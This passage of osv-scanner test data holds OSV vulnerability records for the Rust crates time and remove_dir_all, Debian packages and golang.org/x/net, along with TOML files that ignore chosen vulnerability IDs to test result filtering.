Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault 
in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 
(comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ], "experimental_config": { "call_analysis": { "enabled": false }, "licenses": { "enabled": false, "allowlist": null } } } ================================================ FILE: 
pkg/osvscanner/testdata/filter/some/configs/a/osv-scanner.toml
================================================
# Every vulnerability in this source is ignored. Should not show up at all after filtering.
[[IgnoredVulns]]
id = "GHSA-mc8h-8q98-g5hr"
reason = "Ignore 1" # Alias of RUSTSEC-2023-0018
[[IgnoredVulns]]
id = "RUSTSEC-2020-0071"
reason = "Ignore 2" # Alias of GHSA-wcg3-cvx6-7396
================================================
FILE: pkg/osvscanner/testdata/filter/some/configs/b/osv-scanner.toml
================================================
# golang.org/x/net is the only vulnerable package, but has multiple unique vulnerabilities.
# Ignore some vulnerabilities while keeping others. Package should remain in filtered output.
[[IgnoredVulns]]
id = "GHSA-fxg5-wq6x-vr4w"
reason = "Ignore 1" # Alias of GO-2023-1495
[[IgnoredVulns]]
id = "GO-2022-1144"
reason = "Ignore 2" # No aliases
# GHSA-vvpx-j8f3-3w6h (and alias GO-2023-1571) should remain unfiltered.
================================================
FILE: pkg/osvscanner/testdata/filter/some/configs/c/osv-scanner.toml
================================================
# Ignore all vulnerabilities from one package (remove_dir_all), one vulnerability from another (ascii), and none from the third (time).
# remove_dir_all should be removed from filtered output; the other two packages should remain with filtered vulns.
# remove_dir_all: [[IgnoredVulns]] id = "GHSA-mc8h-8q98-g5hr" reason = "Ignore 1" # Alias of RUSTSEC-2023-0018 # ascii: [[IgnoredVulns]] id = "RUSTSEC-2023-0015" reason = "Ignore 2" # No Aliases # Remaining packages/vulns: # ascii - GHSA-mrrw-grhq-86gf (no aliases) # time - GHSA-wcg3-cvx6-7396 (& alias RUSTSEC-2020-0071) ================================================ FILE: pkg/osvscanner/testdata/filter/some/input.json ================================================ { "results": [ { "source": { "path": "testdata/filter/some/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "unixodbc", "version": "2.3.11-2", "ecosystem": "Debian:10" }, "vulnerabilities": [ { "id": "CVE-2024-1013", "details": "An out-of-bounds stack write flaw was found in unixODBC on 64-bit architectures where the caller has 4 bytes and callee writes 8 bytes. This issue may go unnoticed on little-endian architectures, while big-endian architectures can be broken.", "affected": [ { "package": { "name": "unixodbc", "ecosystem": "Debian:10" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "unimportant" } } ], "references": [ { "type": "REPORT", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260823" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-1013" }, { "type": "WEB", "url": "https://github.com/lurcher/unixODBC/pull/157" } ], "modified": "2024-03-18T12:38:25Z", "published": "2024-03-18T11:15:09Z" } ], "groups": [ { "ids": [ "CVE-2024-1013" ] } ] }, { "package": { "name": "chromium", "version": "73.0.3683.75-1", "ecosystem": "Debian:10" }, "vulnerabilities": [ { "id": "CVE-2024-3847", "details": "Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. 
(Chromium security severity: Low)", "affected": [ { "package": { "name": "chromium", "ecosystem": "Debian:10" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "low" } }, { "package": { "name": "chromium", "ecosystem": "Debian:11" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "low" } } ], "references": [ { "type": "ARTICLE", "url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_16.html" }, { "type": "WEB", "url": "https://issues.chromium.org/issues/328690293" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CWIVXXSVO5VB3NAZVFJ7CWVBN6W2735T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IDLUD644WEWGOFKMZWC2K7Z4CQOKQYR7/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4PCXKCOVBUUU6GOSN46DCPI4HMER3PJ/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PCWPUBGTBNT4EW32YNZMRIPB3Y4R6XL6/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOC3HLIZCGMIJLJ6LME5UWUUIFLXEGRN/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEP5NJUWMDRLDQUKU4LFDUHF5PCYAPIO/" } ], "modified": "2024-05-03T03:16:29Z", "published": "2024-04-17T08:15:10Z" } ], "groups": [ { "ids": [ "CVE-2024-3847" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition 
Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged 
process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. 
That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", 
"aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault 
in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 
(comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] }, { "source": { "path": "testdata/filter/some/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, 
"vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-fxg5-wq6x-vr4w", "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "aliases": [ "CVE-2022-41721" ], "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack", "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", 
"nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1495", "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "summary": "", "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ] }, { "schema_version": "1.4.0", "id": "GO-2022-1144", "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "summary": "", "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. 
While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ] }, { "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", 
"affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" }, "ecosystem_specific": { "urgency": "unimportant" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "summary": "", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": 